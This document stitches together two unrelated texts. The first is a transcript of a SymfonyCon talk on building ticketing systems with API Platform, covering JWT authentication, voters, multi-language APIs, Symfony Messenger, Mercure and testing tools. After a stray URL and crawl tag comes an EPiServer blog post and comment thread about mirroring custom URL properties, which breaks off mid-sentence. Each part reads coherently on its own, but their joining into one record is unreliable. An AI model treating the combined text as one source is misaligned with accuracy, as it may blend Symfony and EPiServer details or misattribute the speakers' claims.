remove. Depends what we need to do and in the persist method what I'm doing, I'm hashing the plain password, removing the plain password, saving User to the database. I can send the email here, I can do whatever logic I want so like I am putting some custom logic in a place in the API platform. What we are using mostly for for for security for a login is JSON web tokens can, which are like standards that are lightweight and simply identification system stateless and they are storing, token to the browser, local storage and then can be authenticated. This depends on the, from the project from the project. For some projects you will need or too or something else. But this works for, for for example, for this ticketing system, this works perfectly. It works very simple. You send request to the server with your user name and password. Server signs the token returns this to you and which every new request you are sending that to the server. What is very important thing that I want you to pay notice here is that insight. When we are decrypting this encoded string, we are actually getting the data about user. We can get any data that we want to start by. For example, we will store email. Why this is okay for our, just before I tell you why this is very important for of course for this, for this authentication, we have two bundles which are LexikJWTAuthenticationBundle and JWTRefreshTokenBundle. JWTRefreshTokenBundle is to use after your token is expired to get a new one. So basically after the login you will get a token and refresh token. Token will sign, we'll have some short time to live. Uh, also one very nice thing too that a lot of developers miss from the documentation is that we have user checker and security component and this can save a lot of time for you. Basically the Symony is using some default UserChecker, but you can implement your own just implementing this interface and then the only thing that you need is put one line of the setup in security.yml. In this way you can do some additional check. It can use any fields that you want for a user, like is it expire, is it blocked, is it deleted, did I ban it or whatever you want. It gives you very, very good flexibility and two points. Preauthorization and PostAuthorization. Resource and operational level on on API platform are quite powerful to set up. So basically what this configuration says, it says that if you want to access to the resource book, you need to be at least the role user. You need to logged in. If you want to create new book, you need to be role admin. If you want to update the book, you need to be owner of that book and you need to be admin. Okay. And what's even powerful is the using voters. You all know what the voters are. Okay, cool. So the same way that you are using voters in any Symfony project with this slide, two lines of the configuration, you can use them in a API platform projects. When I told you that to pay attention on a JWT token, it was about this for example, you're usually your user is stored in your database. You have DoctrineUserProvider, but sometimes in some projects it can happen that your user is stored to some third party API. And then communication with that third party API is not like all this possible or it's like too, too slow. For example, three seconds. You don't want users to wait every time for three second. So what's the nice thing to do? It's actually to create database last user. Since we have email inside JWT token, we can, we don't need to authorize user to load user every time from the database. We can just authorize them from the email because we can trust to the JWT token and this is very, very nice thing to have to have in mind how to do this. It's again just the line of configuration. We need to set up the default JWT, lexik_jwt provider and we need to say our firewall for the API. Can you use that provider for the user all done. The only thing that you need to have in mind is that if you want to get user information, you need to create that manually. You cannot do token get user. Okay. Creating multi language API. This is something if you are doing like big projects usually today you will need to create a multi language APIs. API platform is not supporting that out of the box so when we got this requirement we need to find some solution about it. What we actually did as we are doing a lot of it to Sylius and are also doing amazing work same as, API platform's people. We took the idea about Sylius translation, how, how they are working there and implement that with the API platform. We created open source bundle, publish it to the GitHub and also there is blog post explaining how you can use that. It's, it's actually quite easy what you need after you install the bundle you need to extend your entity that you want to be translatable with the AbstractTranslatable and add first method which is createTranslation that method. It's loading the translation entity that we will implement later. And the second thing is that we need to implement a translation relation to to our uh, to our PostTranslation entity. Of course we need to create some virtual fields which will be used to get single language query and then we need to implement translation entity which will contain all the fields that we want to translate. After we did all of this, we need to set up like few lines of configuration. We need to set up the translation groups for normalizing context and we need to set up translation groups for some filters or whatever we want to use. And how we are using this. It's quite easy when we are creating a new resource we are sending all the languages that we want to create so for example in this example we are creating English and Dutch, sorry Germany and we are sending all the files. We see that we have local, local code inside. If we want to get some language we can query only one language. Then we will use this virtual properties and we will get like only title and the content for the English language. If we want to get all the languages we need to say to send dynamically groups, translation and we will get all the languages listed. Second thing that you need to figure out how to solve when you have multi language API is static translations. There are two solutions. One solution is to use LexikTranslationBundle which stores translation to the database but you can export it to the files. We wanted to have solution that writes directly to the file so that we don't need to have some cron jobs or manually dropping the translations to the, to the files. So there is a guide also on our blog how it's, it's too much code but it's really easy concept. So if you want to learn how to write your own transplantation, you can go there and check it. Uh, next thing that I want to talk is manipulating contexts. This example that I have on a slide is purely from the API documentation, but this is very important thing that we have in API Platform. Why it is important. It is important because for one of the basic examples is that we don't have, we don't need to have two separate APIs for admin and for the regular users. So we can have the same access points, but based on their roles we can have different responses. How this work, again we have some API resource here you can see annotation configuration and then we are adding serializer groups. So you can see at the active that we have book:output and we have admin:input and on the name we have book:output and book:input. So what we are doing, we are creating a service, which is our BookContextBuilder. We are decorating API platform, serializer context_builder and we are building our custom logic inside and this is very simple concept. Again, we are just checking what we are doing like is are we talking about book resource, do are we doing denormalization or normalization is user logged and do they have admin role? If they have just check for the context groups and add group admin:input period, that's it. You will get a different response for user and for admin user. Oh, Symfony Messenger component please. Who's using Symfony Messenger component. Okay. Not much people but like a lot 20%. Symfony Messenger component is a very simple component to start using it. It allows us to have like communication between queues, between different application, easy to implement, easy to use, making asynchronous communication easy. It just works in very simple way. You have sender, you have handler, sender sends a message, handler takes that message, do some logic. We have some bus transportation between that. We can have some middleware, but you can read that in documentation. Why I'm talking about this because with Symfony messenger and API platform, we can have Command Query Responsibility Segregation or CQRS pattern. It's very easy how it works. Basically you just need to set up configuration. Again, you will say a message that we are using messenger, that output is false for example, and response on this action will be 202, like status. Okay. Then the handler will do other things. We'll do heavy, heavy things. This is the simple thing. I want to talk about more, more advanced thing. Also you can use that in the image in ImageMediaDataPersister for example, data persisters skier, like if you have image that you want to resize, you can dispatch a message than some Lambda or cloud, whatever can do the work, return the image or whatever. Uh, also you can use it in events, but as I said, like try to use other extension points. This is the reason why messenger is very important for me. If you are talking about, this is the project that I'm actually working on. It's fully hosted on a Google cloud platform. It is event sourced, distributed base. I don't know. Architecture. Okay, so what we have in the blue is the thing that is actually hosting our Symfony application in the yellow and orange are cloud functions from the, from the, from the Google cloud platform and Firebase and other things. We have a bunch of the pub and sub services communicating between and the API platform is this small red.here. Literally API platform exposing the rest API to the, to the client's app and everything in the behind. As I stated in the beginning of my talk is Symfony, so basically Symfony is always like more complex part than just API platform. So if you're talking about Symfony and the messenger, if you read documentation it's always sending the message to some application and then that same application is consuming the message. That works perfectly. But usually that's not how the things work. Usually you are at least communicating between two different Symfony applications only or even in, in better case you are communicating with some third party applications, nodeJS, GO applications, whatever and Symfony works perfect in first case, it works not so good in second case it doesn't work at all out of the box. In the third case actually you need to do, can I say out of the box? It doesn't work just with configuration that you set up in your Symfony application. Why? This is how Symfony dispatch message it looks like. We have body which actually contains our message. Then we have a bunch of headers which are describing which handler will be used and some which command bus, blah blah blah like a bunch of configuration that is needed in our Symfony application. If you dispatch this message app message CommunicationMessage to some other Symfony application, there is huge, there is huge chance that you are not using the same namespace so this won't work if you are dispatching the message from the node JS application for example, which was my case, you are not having properties on the headers. You don't have the body which is string actually contains escape, escape JSON and properties and the headers are proper JSON. You actually have this, we will have some JSON like no description, nothing. Then me and colleague, developer and a team, we start working and he was dispatching the message. I was getting errors, errors. I start researching and then the simple solution was can you add the headers and other things that we need and at the first was like, huh, no, but that's the only message that we are consuming at the moment from the other side like, okay, let's do that. That's the quickest way, but that's not like sustainable way. We want to do that better. So how you can do that is actually you can write your custom ExternalJsonMessageSerializer what that message JSON serializer do. It's actually receives your message, decodes from the string to array and then based on some parameter, if you have it in a message, it can checks what is happening, what it is, what it is receiving, and then can create the message that your SymfonyMessengerHandler needs so that it's possible to do. Of course you need to have some parameter which you can, which you can catch on this point. We were lucky enough so we'd have this key based on the key I know that's testing or communication or caching or whatever and I have variables which I know that they are body of my message. Again, you need to create your message as I said you, we need you. We'll return that. That will work. Also you need to set up some configuration because in in a default configurations Symfony Messenger is using the default Symfony Messenger, deserializer second solution that is also possible is that using the HappyMessageSerializer why I didn't put the code for a message serializer because it has the dependency you need to have body property in a JSON and with this custom serializer we can even outweigh that. Also there is a blog post Symfony Messenger on AWS Lambda that Tobias wrote. I think so, yeah. Also have in mind that messenger component is similar to ORM components. It will work in most of the cases, but if you have some like really, really specific cases, you will need to build something by yourself at some point or at least like really hard customizations. Handling emails with new Symfony Mailer component that is easier than ever. Like we have a bunch of emails that we are sending bunch of notifications in, in, in all, in all applications that are mentioned at the beginning. So how to do is like read the Symfony Mailer component. You have really easy integration with Symfony Messenger. So that means you can send them asynchronously. You have also support for the load balancer. So if you have like three or four different transports for the emails, it will spread them like with the round Robin method, uh, it's also high level availability. If a fail over, if something fails, it will go to second then the third transportation, for the email, it supports out of the box. It supports Amazon, SES, Gmail, MailChimp, Mandrill, Mailgun, PostMark and SendGrid. And that's for me personally, that is the best thing that happened with this component because usually setting up the emails was pain in, really painful. So yeah, that is something if you are not using, check that it's much better than just Swift mailer that we had like a few years ago or even a few months ago. Uh, creating reports and exports. When you are doing ticketing systems, that is like something that you do on a daily basis. What we had as a problem was importing data from the few different sources, storing that in a database, doing some transformation and exporting in a total different format to our users, so how we did the importing first we set up the crawlers with the Symfony Messenger component. We crawl all the data that we need. We could not do transportation on a fly because there was too much relationship between all the data that we are getting, so we need to store that to the database. Then do transformation. Then again store that to the database to get it in a format that we want to use. Now that when we have the format that we can store in data base that we can read that we can do some operation with that we needed to export that to CSV files. It's the same if you are doing XML it's the same if you are doing XML files, what you need to do is actually create custom operation for export. You need to change the format to the CSV. For example, in this case you need to say what is DTO Data Transformer Object for your output in this case is OrderExport class, which group we will use for in this case OrderExport and that in this case is a POST method. I got the question why it is POST not GET? The POST because when we are creating something we always use the past and in this situation we are creating some document that does not exist. So that's our logic. Again, you can use GET if you want. Next thing is that you need to create this DTO object. It's simple model. Sam as you have model for for reading and writing to your database by entity. You have this DTO here which contains bunch of properties, get and set methods so you can go with the public that that depends on you. A second thing is that you need to implement DataTransformer, DataTransformer again is a simple class that do only one thing. Transform data from one format to some other format. Not, not a format, wrong word. Like literally from one object to another object and doing some like changes on, on the way how we store the data. So what we have here, we have export on the left side, which is created in, ah at the beginning of the transfer method. And we are setting the values and transforming if it is needed for exporting to the uh, to the, to the end user. What is very important here if you didn't, uh, if you didn't notice this pagination is enabled false. Why it is that because in the report we want to have all the data that we have in a database. By default we will get 30 of of that. And that's it. That's how you do exports. How you do reports in any format that you want. You just need to create objects that will contain data and export it to the, to the users. Real time applications with API platform. Who, who is using or who heard about Mercure. Okay, cool. So in like, this is like what we can do now easily. And what are the real time application? What the real time applications are. So like if you do update on the web, it will be updated on all mobile devices that are connected together. In the past there was a way to build real time applications, but usually that was like some, let's call it weird solutions. It will be ready with NodeJS combination that they will be subscribed to PHP will publish to the Redis, Node will read it, and then to the web sockets will send it to all the clients that are connected. There was Pusher solution like hosted solution, ReactPHP did something. I think they did actually a good job there. But to be honest, the PHP is not built for real time applications. PHP is built for request response. We all know that. So what actually changed here is that we have this Mercure HUB which is created by Kevin. Kevin did a lot of amazing work with the Symfony, with the Mercure. If you listen yesterday. So basically what we are doing after we create something, we passed that resource to the Mercure hub. And then Mercure hub sends server-side events to all clients that are connected to Mercure hub. It cannot go in opposite directions. So it's not a duplex communication as web sockets, but in 99% cases this will be solution that will work for your project. So if you are doing chat application, if you are doing push notifications, that will work. Now this is just a short description. It's written in Go, it's based on, it's automatic to HTTP to HTTPS, it has CORS support, Cloud Native, it's open source and bunch of other things. This is very interesting. It works very easy out of the box with API platform. So basically you only need to say it's Mercure true on any changes that you do with your resource. It will be automatically sent to the Mercure hub and it will be, if you're, if some users are connected, they will get the data. This part of the JavaScript is the freelance of the code that you need to subscribe to the mercure and get the data. Uh, once the event happens. If you are doing a big applications like this, you need to write a test. So what what we learned during during this applications is that for example, we don't believe in 100% coverage of the tests because that usually will means that we will lose a lot of time. But we believe in smart testing like we want to test the critical cases, we want to test any bug that happened. We want to have like really good structure tests. Also for legacy code we have policy like if we got some bug or something we will first cover that with a test and we will resolve that. And also like if you are not very experienced, maybe TDD will be hard at the beginning for you. So just start writing the tests. But I want to talk a little bit about API testing tools. First tool is that you have it out of the box with with API platform is HTTP client in API platform which which manipulates the Symfony HTTPKernel directly. So it give boost of performance and you will have much faster tests. If we are comparing that with the test over the network. Also it's good to consider another tool which is APITestCase. They are quite similar, I would say from the, from the Sylius project and in API test case you get a lot of helper methods that can save you a bunch of time like testing is is JSON equals something? Is JSON contains something is this, is this matching the schema that we defined for the resource for example book, book object. A second very useful thing is PHP Matcher because if you are creating dummy data you don't want to create data like Antonio surname Peric, SymfonyCon. You want to just check is this string type is this integer type is this date is this array contains something that is possible with the PHP Matcher and this will save bunch of time for you. There is plenty of methods inside that so you can basically check any type of expression that you have inside your response. If you are setting up the new project and you don't have a data Faker, which is, which works with AliceBundle under the hood, it's very, very useful tool to create dummy data which looks real data. Kevin used that yesterday for, for his demo at the end of the talk. So the data were created with the AliceBundle. Also you can use Postman test. Postman tests are very nice but they will be slower than API test case both from the Sylius and from the API platform because the Postman can later be used as ah interactive specification of your API for your front end developers. The tests are written in NodeJS but they are very, very simple to write and then you can integrate them with the Newman, Newman in your console or in your CI and just run it before deploying to the server to check is everything okay with uh, with uh, with your, with your tests, with are API, sorry. Also some tools for checking test quality like Infection, PHPStan, Continuous Integration, other things. I think you are listening a lot about these tools. So I will just mention them and yeah, use them. They are good tools. Okay. Last slide before I'm done is actually the picture that Fabien Potencier tweeted a few days ago about the book he's writing and about architecture of the modern modern application built with a Symfony. So the applications that I, that I mentioned today that I described some parts of how they work are actually built in this way. We have a bunch of models which are integrated to work together. Some models are communicating directly to the API inside the code. Some are communicating to the message component, depends on the things, what are they doing and the API, the API is like I'll say API is only one part which is exposing that to the user but also it give us like really nice extension points where we can put a bunch of our logic. Usually of course in this kind of applications you have a lot of console command applications which are doing a lot of background job as a workers or as cron jobs or or whatever. Uh, one last thing, like conclusion API platform and a Symfony especially Symfony 4 are really awesome tools and I think we all should be happy that we have that good framework in PHP and that we are using that as a part of our everyday work. Thank you.
https://symfonycasts.com/screencast/symfonycon2019/using-api-platform-to-build-ticketing-system
CC-MAIN-2020-16
refinedweb
6,489
70.53
Imagine you want to write an e-commerce application, where people can search for interesting stuff, place orders, which keep informed about new articles and much more. You might write a file that contains all necessary functions, for example (pseudo code): add_item_to_basket(customer_id, item_id) remove_item_from_basket(customer_id, item_id place_order(customer_id) get_items_from_basket(customer_id) subscribe_to_newsletter(customer_id, newsletter_id) unsubscribe_from_newsletter(customer_id, newsletter_id) search_for_item(name_pattern) change_user_name(customer_id, name) change_password(customer_id, password) Of course these are just a few high level functions an application like this will need. You will end up with a few thousand functions more with certainly tens to hundreds of thousands of lines of code in a single file. What’s wrong with this? First of all, no one wants to edit a single file of that size. It is hard to keep an overview where to find a certain function. The main drawback, though, is that all the different functionalities like basket, user management and so on are mixed up in one file! Wouldn’t it be great if every component were independent and individually maintainable? Or maybe you want to share components between different parts of the application? Or use the work of others, save time and avoid error prone development? Or even make your code available for others? This is where modularity steps in! Learning goals In this tutorial you will learn how to organize your code by modular programming. The basic concept of modular programming in Python is to place your classes and functions in modules and packages. What’s a module? All programming tutorials start with the well known “Hello, World” program, so let’s create a file hello_world.py with the following content: print("Hello World!") and execute it with your Python interpreter python3 hello_world.py hello_world.py is a called a Python source file. When your program gets larger and more complex it might be helpful to print out some meaningful messages to track which part of the code is executed, but only if during development or testing. You could write something like this: def print_debug_message(message): if show_debug_messages == True: print("Debug: " + message) show_debug_messages = True print_debug_message("Begin of Hello World") print("Hello World!") print_debug_message("End of Hello World") This works as expected. But the function print_debug_message and the variable show_debug_messages have nothing to do with our “Hello, World” program. They bloat up the code and do not fit in context. And maybe you want them to use elsewhere. Let’s create a new file for our debug tools and name it debug_tools.py. Move print_debug_message and show_debug_messages to this file and add an init() function: def init(): global show_debug_messages show_debug_messages = False def print_debug_message( message ): if show_debug_messages == True: print( "Debug: " + message ) Bravo, you just created your first module! And you can instantly use it in your hello_world.py code: import debug_tools debug_tools.init() debug_tools.show_debug_messages = True debug_tools.print_debug_message("Begin of Hello World") print("Hello World!") debug_tools.print_debug_message("End of Hello World") Note: In this example we use the global statement that hasn’t been introduced yet. If used in a module, it defines a variable that is visible throughout the whole module but only in the module. A Python module is in fact a Python source file and the name of the module is the filename without the .py suffix. You can use a module by loading it with the import statement. As you can see, you have to prepend debug_tools followed by a . to the functions of the module you want to use. We will talk about this in a later chapter where we will take a deeper look at the import statement. Note: You might have heard that “Python has batteries included”. That means Python comes up with a lot of built-in functionalities. And in most cases there is no need to write a debug module from scratch again. This is just for learning purposes. What’s a package? Larger software projects use many modules. Saving all these module files in the project root directory is not a best practice, as it is – again – hard to maintain and to track. You can group your module files by moving them into packages. A package is simply a directory containing a special file __init__.py that is called package initialization file. Whenever Python discovers this file in a folder, this folder will be used as a package. The __init__.py file may be empty, but it also may contain initialization code for you module (that´s why it is called package initialization file). How to import a package To use a module inside a package you invoke the import statement: import debug_tools.debug_to_console debug_tools.debug_to_console.print_debug_message(“My debug”) Here you use the print_debug_message function from the debug_to_console module that is part of the debug_tools package. The file system would look like this: myMachine:~/pythonDemo> ls -R debug_tools my_program.py ./debug_tools: __init__.py debug_to_console.py In fact, we imported a module from a package. Let’s take a deep dive into the import statement. The import statement Simple import There are several ways to import modules and packages. Until now we used the import statement as follows: import my_fancy_module to import a module and import my_cool_package.some_module to import a module inside a package. You can also import multiple modules in one statement: import my_module1, some_other_module, an_even_better_module You may also import only certain functions from a module from my_math import pi And use it then directly as follows: print(pi) Importing and renaming Sometimes it may be useful to change the name of a module. To change the name you can import like this: import my_module_that_does_math as my_math You can now use functions of that module as: value = my_math.get_square_root(2) Be careful! If you change the name of a module it may be hard to track where the module is used. Another use case for renaming a module is to avoid naming conflicts. For example you have two packages with a module named debug. You may import them as: import frontend_package.debug as frontend_debug import backend_package.debug as backend_debug This applies also to the from ... import ... as ... statement. Global vs. local imports If you import a module or package on top of your program (like we did), the module or package is loaded in the global namespace. That means you can use the imported code everywhere in your code file. This is generally best practice. Next to the global namespace there is the local namespace. Take a look at this example: def my_local_function(): import some_module some_module.just_do_it() All the functions and variable of the imported module are only visible and usable from within the function my_local_function. We say the module is imported to the local namespace. Generally, you should avoid importing in a local namespace. However there are some circumstances when importing locally is recommendable. For example, assume you have a huge package that is used rarely. Because importing it executes a lot of initialization code, this might take a while, so you only want to import if it is really necessary. To see what is exposed to your current namespace you can use the dir() function. Start your Python interpreter, execute dir() and you should see something like this: >>> dir() ['__builtins__', '__doc__', '__name__', '__package__'] Now import the math package: >>> import math >>> dir() ['__builtins__', '__doc__', '__name__', '__package__', 'math'] math is added to your namespace. dir() accepts also an argument. If the argument is a module object, the list contains the names of the module’s attributes. Try it with the imported math module: >>>'] Exercise A fundamental data structure is a stack. It is a collection of data with two basic functions, push and pop. For a much more detailed description see Wikipedia. Another data structure is a FIFO. Wikipedia again gives you a detailed explanation. The basic FIFO functions are enqueue and dequeue. Here is the challenge: Implement a package data_structures with two modules named stack and fifo. All functions have an array as an argument that push, pop, enqueue and dequeue elements to and from the array. Example: data_structures.stack.push(my_array, 5) my_value = data_structures.stack.pop(my_array) data_structures.fifo.enqueue(my_array, ”FSE”) my_value = data_structures.fifo.dequeue(my_array) Write reusable code Always design and implement your module or package in a way that makes it useful not only for a single or very special purpose. For example, is your stack module limited only to numbers? Or just strings? It should work with all kinds of objects and data types. Use a style convention. Do not mix up different styles in your modules. The most commonly used and recommended style guide for Python is PEP 8. Document your code both for yourself and your users. It helps others to use your module easily. There are many ways to document Python code. For further information about documentation we recommend docstrings and Sphinx.
https://fullstackembedded.com/tutorials/conquering-the-chaos-how-to-write-modular-code/
CC-MAIN-2018-47
refinedweb
1,465
57.67
an arcade or flight sim joystick button board or an Arduino Leonardo for a few bucks from China (DX.com). You will need: Arduino Uno Any sort of button or switch (or multiple switches, but start off simple) 10kΩ resistor(s) (one for each button) Eclipse (the front end for Java programming – instructions later on for install) Arduino Software (the front end for Arduino programming) Breadboard Jumper wires Patience Any video game that you may want physical switches for (racing/flight sim) Step 1: Installing & Testing the Software First of, you will need Eclipse (). For this tutorial, I will be using Eclipse Classic 4.2.2 – 64 Bit. If you’re running into problems during the install, refer to either Google or the FAQ. Now that Eclipse is installed, you will also need the Arduino program (). I’ll be using the stable 1.0.5 version. You can skip this step if you know how to upload sketches to the Arduino. Now that you have all the software installed, we’re going to go ahead and setup Arduino first. In the Arduino software, click tools and make sure the board and port number make sense according to Device Manager. To test the board, go File>Examples>Basic>Blink then hit the arrow in the top left that says upload. If all goes right, the SMD on pin 13 should be blinking. Refer to THIS if you’re having difficulties. Step 2: Wiring up a Basic Switch & Programming In this step, you will be hooking up a basic switch to pin 5. Why pin 5? I have no idea but here’s the wiring diagram (Made using Fritzing). There’s two diagrams, one for (1) 2 pin switch and one for (4) 4 pin switches. Now that you have a switch hooked onto pin 5, we begin programming in Arduino. The code I used is attached and below: // ********************************************* // this constant won’t change: const int buttonPin = 5; // the pin that the pushbutton is attached to // Variables will change: int buttonState = 0; // current state of the button int lastButtonState = 0; // previous state of the button void setup() { // Initialize the button pin as an input: pinMode(buttonPin, INPUT); // Initialize serial communication: Serial.begin(9600); } void loop() { // Read the pushbutton input pin: buttonState = digitalRead(buttonPin); if (buttonState == HIGH) { // If the current state is HIGH then the button // Send to serial that the engine has started: Serial.println(“Start Engine”); delay (100); } // Save the current state as the last state, // for next time through the loop lastButtonState = buttonState; } // ********************************************* When uploaded to the Arduino, you can open up the serial monitor (Tools>Serial Monitor) and press the button. It should display “Start Engine” as long as you’re pressing the button. You may fiddle with the delay later on to suit your liking but please note this may cause issues in-game. You are now sending a serial string through tactile feedback. This is great! Step 3: Setting up Eclipse and Installing Libraries Now we need to do something with that serial string. A program needs to pick it up and translate it into keystrokes. This is where Eclipse comes in and things get messy. Off the bat, you will need to download and install the RXTXcomm library () into Eclipse. I used the rxtx 2.1-7r2 (stable) version. Place RXTXcomm.jar into Eclipse’s [Your workspace]/lib/jars folder as well as placing the rxtxParallel.dll and rxtxSerial.dll files into [Your workspace]/natives-win. This is where most people will go wrong if they do so feel free to ask if you have questions. Now that you’ve installed the RXTXcomm library, we can begin coding in Eclipse. Open it up and go File>New>Project…>Java Project. For the sake of simplicity and ease, name this project SerialTest. While this may not be the proper method, there’s no reason for it not to work this way. Click finish. Under the package explorer sidebar, right click on the SerialTest folder and go New>Class we will also name this SerialTest. Make sure public static void main(string[] args) is checked on. This is a Java program in its simplest, however, we still need to import those libraries from earlier. Right click on the same project folder and go Build Path>Configure Build Path. Under the Libraries tab, click Add External JARs and navigate to where you put the RXTXcomm.jar ([Your workspace]/lib/jars) and open it. Click OK. You are now ready to begin programming Java using the serial communicating library. If you’ve made it past this part, congratulations. You didn’t spend hours trying to figure it out like I did. Step 4: Programming in Java to Interpret Incoming Serial & Testing Now, bare with me because I know nobody likes working with other people’s code. It just sucks. You may have to modify the COM channel, parity, stop bits and baud (data) rate settings in the code (all of which can be determined through Device Manager but should be the same as the code). The code below works with Linux, Mac OS X and Windows. My Arduino is on the default COM1 at 9600b/s. I accidentally left some experimental code in there while making a GUI but they won’t affect anything so try to ignore understanding some of the library imports. The SerialTest folder is also attached for reference. // ********************************************* import java.awt.AWTException; import java.awt.Robot; import java.awt.event.KeyEvent;; import javax.swing.*; import javax.swing.event.*; import java.awt.*; import java.awt.event.*; import javax.swing.JFrame; import java.awt.Color; public class SerialTest implements SerialPortEventListener { SerialPort serialPort; /** The port we’re normally going to use. */ private static final String PORT_NAMES[] = { “/dev/tty.usbserial-A9007UX1”, // Mac OS X “/dev/ttyUSB0”, // Linux “COM; } } } System.out.println(“Port ID: “); System.out.println(portId); System.out.println(“”);(); // ENGINE START if (inputLine.equals(“Start Engine”)) { System.out.println(“Engine Start Engaged”); try { Robot robot = new Robot(); robot.keyPress(KeyEvent.VK_S); robot.delay(500); robot.keyRelease(KeyEvent.VK_S); } catch (AWTException e) { e.printStackTrace(); } } // WINDSHIELD WIPERS if (inputLine.equals(“Windshield Wipers”)) { System.out.println(“Windshield Wipers Engaged”); try { Robot robot = new Robot(); robot.keyPress(KeyEvent.VK_W); robot.delay(500); robot.keyRelease(KeyEvent.VK_W); } catch (AWTException e) { e.printStackTrace(); } } // PIT SPEED LIMITER if (inputLine.equals(“Pit Speed Limiter”)) { System.out.println(“Pit Limiter Engaged”); try { Robot robot = new Robot(); robot.keyPress(KeyEvent.VK_P); robot.delay(500); robot.keyRelease(KeyEvent.VK_P); } catch (AWTException e) { e.printStackTrace(); } } // HEADLIGHTS if (inputLine.equals(“Headlights”)) { System.out.println(“Headlights Engaged”); try { Robot robot = new Robot(); robot.keyPress(KeyEvent.VK_H); robot.delay(500); robot.keyRelease(KeyEvent.VK_H); } catch (AWTException e) { e.printStackTrace(); } } } catch (Exception e) { System.err.println(e.toString()); } } if (oEvent.getEventType() == SerialPortEvent.DATA_AVAILABLE) { } // -“); System.out.println(“”); } } // ********************************************* As you can see, there are 3 other buttons hooked up. Whenever Java sees the serial input of “Start Engine” , it will send out a keystroke of S. The output console will throw IO.Exceptions at you but don’t fear, it’s fixable by commenting out both System.err.println(e.toString()); lines. These errors do not interfere with anything so they’re nothing to worry about to begin with. To change what each switch does, simply change the variables that are getting written to serial in Arduino and change the respective conditional statements in Java for when it receives those serial strings. To see the list of available commands for robot in Eclipse, type robot. and a little box will pop up showing various functions. Robot is amazing, you can even assign it to move the mouse based on Arduino input. For more detail: Using an Arduino Uno R3 as a Game Controller We recommend EasyEDA for electronic circuit design. From Schematic Drawing to PCB Production, Just Need One Tool Cheap PCB Prototype: 10 pcs 2 layers only $10, quick delivery, 100% E-test
http://duino4projects.com/using-arduino-uno-r3-game-controller/
CC-MAIN-2017-09
refinedweb
1,317
58.48
Have started to investigate some mirroring issues @GarethKelly have reported regarding Itera.MultiProperty. But pretty soon (after I got the damn mirroring stuff to work :) ) I discovered that the mirroring service don’t just look at the IReferenceMap but also on the type of the property. To get mirroring to work you need to (as muhammad kashif pointed out) copy your dll’s to the subfolder MirroringService\bin I thought that if I made a reflector copy of PropertyUrl that copy should behave exactly the same as PropertyUrl. That is not the case regarding mirroring. I tested this with creating a page with the 2 properties, and got these results. PropertyUrl Page: Mirrored page Reflector copy of PropertyUrl Page: Mirrored page Strangly is that if I fill out the same values on the source page, the mirrored pages properties points to the same document (the correct) Why is it like this? If we do some reflectoring, we can se that there are special handlers for different kind of properties So I though, great, I can make my own, but as far as I can see this stuff is registered inside DataExporter This is extremely bad news for every developer of EPiServer that want to create custom properties. This makes mirroring a bit hassle. One solution the overcome this shortcoming of mirroring 2.0 we could create a PropertyXhtmlString property on each page where we automatically add a href to each element from the IReferenceMap. But that would be counter productive. There shouldn’t be any difference between a Reflector copy of PropertyUrl and PropertyUrl! Is there anything I have overlooked Mr EPiServer :) ? Added some thoughts 30. sept After a god night sleep, I have thought some more about this mirroring issue, In my opinion the first problem is that the mirroring service need to know the properties (have a copy of the dll’s) This approach have already given me problems with auto attaching virtual maps and other stuff. Its like that a telecom operator need to know what kind of person you are to be able to transmit your voice.. Its shouldn’t be like this at all. Common, you have added a change log construction. That construct could have taken care of your extra needs. There is also already in place a SoftLinks construction (that could need some love) that could have provided you with what resources a page reference to. The other problem is that before all properties had 2 sides. One data container side, and one display/edit side. With the stuff in the DataExporter you have introduced a 3. side. And left us developers with (as I can see) any methods to add code to this side. In the past you (Mr EpiServer) have been reluctant to change code since it will break existing project. This new code breaks that rule big time. Added some more thoughts We actually considered doing mirroring independent of custom modules. There are some nice benefits with that, one that deployment of custom modules would not be needed and another thing is that it would probably be a lot faster since you can then work with the “raw” data format. The decision after some thinking was however not to implement it that way. The main reason was that several scenarios require that we need to be able to create PageData (which contains the custom properties) instances. Below are some reasons: • There are a lot of modules out there that relies on DataFactory events such as CreatedPage, SavedPage, DeletedPage etc. So to get these events fired when doing mirroring as well then we need to create up PageData instances and save those through the ordinary DataFactory API. • To be able to handle properties that implements IReferenceMap it is required that the property is instantiated (see below on more information about IReferenceMap). • Using DataFactory API is also required to be able to support mirroring to custom PageProviders. • For maintainability reasons we did want mirroring to use the same API as import/export (which works with PageData instances). Regarding the event handlers in DataExporter and DataImporter they are not new in CMS6 but has existed in CMS5 as well so in that matter nothing new is introduced with Mirroring2.0 regarding that. The idea with the event handlers is to expose an opportunity to handle extra logic for a property when it is imported or exported. A typical use case is when the property has some dependent external resource (like a PropertyUrl referencing a file or a PropertyXForm referencing an XForm) then the event handler is responsible for adding the actual resource (for example a file or an XForm) to the export package. The events are publically static declared so you can register your own handlers for your custom properties. The identity of a resource (for example a file or a page) might change during import (otherwise you would not be able to import the same package several times). To handle this scenario a property can implement IReferenceMap. The purpose of IReferenceMap is that a property that implements this interface will at import (before the property is saved) be called with a Guid map as parameter so the property can change its reference to the new identity. Hopefully you now have some more knowledge regarding why it is implemented as it is. But of course there are always things we can do better. For example your idea of that resources automatically could be found and included in package is interesting and something I hope we can do more around. We are thankful for your feedback and will take that in consideration for upcoming versions. Hi Johan ((PropertyUrlTransform.ExportEventHandler )); ((PropertyUrlTransform.ExportEventHandler )); I can understand that you have made a choice and then sticking to that. But after I read what you have said here, I’m wondering if the mirroring stuff is like a new episerver instance? Do it insert directly into the database. I guess so since if you had used the API that would have taken care of the page events. That takes me to my current problem. How to attach myself to the DataExporter. I need to attach myself to the DataExorter instance that is running in the mirroring pool. I have tried [ModuleDependency] [Serializable, PageDefinitionTypePlugIn] public class PropertyTestPropertyUrl2 : PropertyString, IReferenceMap, IInitializableModule { #region IInitializableModule Members public void Initialize(InitializationEngine context) { DataExporter.ExportPropertyEvent += new EventHandler } public void Preload(string[] parameters) { } public void Uninitialize(InitializationEngine context) { DataExporter.ExportPropertyEvent -= new EventHandler } #endregion But this doesn’t work. Can you provide an example how we can make our own PropertyUrl property that actually work? When a mirroring job executes it actually creates an EPiServer.Enterprise.Mirroring,MirroringDataExporter (which inherits DataExporter). Since the event is declared as static it will not be inherited so instead MirroringDataExporter exposes it's own ExportPropertyEvent. This construction is really not something we are proud of but since the event was declared static and we could not break backward compatibility this was how it was done. So your code should run just fine if you instead hookup to MirroringDataExporter.ExportPropertyEvent (if you want your code to execute both for mirroring and ordinary export you typically hookup to both events). It works by hooking up with MirroringDataExporter, but I see that the property is a RawPropertyData, so I have to parse they text instead of useing methods on my property. It's also a hassel since It's difficult to check 